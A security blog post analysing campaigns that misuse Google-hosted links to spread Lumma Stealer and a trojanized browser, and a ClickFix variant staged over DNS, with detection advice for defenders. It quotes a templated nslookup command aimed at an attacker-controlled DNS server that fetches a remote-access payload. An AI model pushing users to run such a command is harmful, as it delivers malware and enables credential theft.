CyberLeveling Logo
Old Trick, New Wrapper: How DNS and Trusted Platforms Are Powering Modern Malware Campaigns

Old Trick, New Wrapper: How DNS and Trusted Platforms Are Powering Modern Malware Campaigns

Feb 22, 2026

If you’ve been in security for a while, you’ve probably had this reaction to the recent ClickFix reporting:

“Wait… nslookup over DNS? That’s not new.”

You’re absolutely right.

DNS-based payload delivery has been around for years. What’s changed is how attackers are packaging it, scaling it, and blending it into everyday workflows. When you combine that with abuse of trusted platforms like Google services, you get campaigns that don’t look suspicious until it’s too late.

Let’s unpack what’s happening and why it matters.

Part 1: Abusing Google Services to Deliver Lumma and a Trojanized Browser

One of the more interesting recent campaigns was documented by CTM360. The attackers leveraged legitimate Google infrastructure, including:

  • Google Groups threads
  • Google Docs and Drive links
  • Redirect chains hosted on Google domains

Instead of hosting malware on obviously malicious domains, the attackers planted links in discussion threads that appeared technical and legitimate. Victims would click a Google-hosted link, which then redirected them to a payload.

What Gets Delivered

Depending on the operating system:

  • Windows systems receive Lumma Stealer, a well-known infostealer that harvests credentials, steals cookies, and targets crypto wallets. In some cases, archives are padded to large sizes to evade automated scanners.
  • Linux users are served a trojanized Chromium-based “Ninja Browser.” It looks like a privacy-focused browser but installs malicious extensions and establishes persistence for remote access.

Why This Works

The key isn’t technical novelty. It’s trust.

  • Security tools tend to trust Google domains.
  • Users tend to trust Google-hosted links.
  • The initial infrastructure doesn’t look malicious.

This is infrastructure laundering. The malware isn’t on Google’s servers, but the delivery path starts there.

Part 2: The ClickFix DNS Variant — Not New, Just Smartly Repackaged

ClickFix attacks rely on social engineering. A user sees a fake error page that tells them to copy and run a command to “fix” something. Historically, these launched PowerShell download cradles. The newer variation instructs users to run:

nslookup <malicious domain> <attacker-controlled DNS server>

The DNS server responds with data containing embedded script content. That output is then used to execute a second-stage payload, often a remote access trojan like ModeloRAT.

DNS-based staging is not new. We’ve seen for years:

  • DNS tunneling tools like DNScat2
  • Payload retrieval via TXT records
  • C2 over DNS
  • Data exfiltration over DNS

What’s new is the integration into a user-driven ClickFix flow. The attacker doesn’t exploit a vulnerability; they convince the user to execute a living-off-the-land binary.

The Bigger Pattern: Living Inside Trust

1. Abuse of Legitimate Infrastructure

Google services. DNS. Native Windows tools. There’s no exploit chain to analyze. No zero-day. Just smart misuse of what already exists.

2. User-Initiated Execution

The victim clicks the link. The victim runs the command. The victim downloads the file. That dramatically reduces the need for complex intrusion methods.

3. Evasion Through Normalcy

Oversized archives, DNS responses, and redirect chains on trusted domains. These campaigns aren’t noisy. They’re blended.

What Defenders Should Focus On

1. DNS Visibility Is No Longer Optional

  • Log DNS queries and responses
  • Detect endpoints using external DNS resolvers
  • Identify unusually long or encoded DNS responses
  • Flag rare use of nslookup on workstations

2. Watch for Behavioral Chains

Look for sequences: Archive download → process execution → browser credential store access. Chaining legitimate behaviors is the hallmark of modern campaigns.

3. Stop Blindly Trusting Trusted Domains

Reputation alone isn’t enough. Inspect redirect chains and evaluate the final delivery, even if the origin is a trusted cloud provider.

4. Hunt for Infostealer Behavior

If you detect access to browser SQLite databases or suspicious outbound HTTPS sessions shortly after execution, assume compromise and contain immediately.

5. Train Users Beyond Phishing Awareness

Users should know that no legitimate website requires running terminal commands to fix errors. Attackers are leaning into technical legitimacy; your training must adapt.

Final Takeaway

The nslookup technique, DNS staging, and trusted infrastructure abuse are not new. What is new is the seamless integration into scalable, low-friction attack chains.

There are no zero-days here. Just trust abuse, user manipulation, and lightweight staging over channels that most organizations barely inspect.